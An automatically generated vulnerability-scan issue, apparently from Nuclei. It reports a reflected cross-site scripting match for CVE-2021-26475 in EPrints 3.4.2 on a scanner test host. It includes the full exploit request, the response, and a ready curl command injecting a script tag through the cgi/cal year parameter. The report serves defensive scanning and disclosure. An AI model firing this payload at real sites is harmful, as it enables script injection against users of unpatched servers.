mkrs2404 / tickets


EPrints 3.4.2 - Cross-Site Scripting (CVE-2021-26475) found on honey.scanme.sh #13

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: CVE-2021-26475 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%272fp47zHs6nd9C0zIitcLlTiBIBv%27)%3C/script%3E

Timestamp: Tue Apr 30 13:42:06 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/ca870fce852cab45140ed0a9f69bb785

Template Information

| Key | Value |
| --- | --- |
| Name | EPrints 3.4.2 - Cross-Site Scripting |
| Authors | geeknik |
| Tags | cve2021, cve, xss, eprints, intrusive |
| Severity | medium |
| Description | EPrints 3.4.2 contains a reflected cross-site scripting vulnerability via the cgi/cal URI. |
| Remediation | Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability. |
| CVSS-Metrics | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| CWE-ID | CWE-79 |
| CVE-ID | CVE-2021-26475 |
| CVSS-Score | 6.10 |
| vendor | eprints |
| product | eprints |

Request

GET /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%272fp47zHs6nd9C0zIitcLlTiBIBv%27)%3C/script%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 326
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:06 GMT

GET /cgi/cal?year=2021</title><script>alert('2fp47zHs6nd9C0zIitcLlTiBIBv')</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4' 'https://honey.scanme.sh/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%272fp47zHs6nd9C0zIitcLlTiBIBv%27)%3C/script%3E'

Generated by Nuclei v3.2.5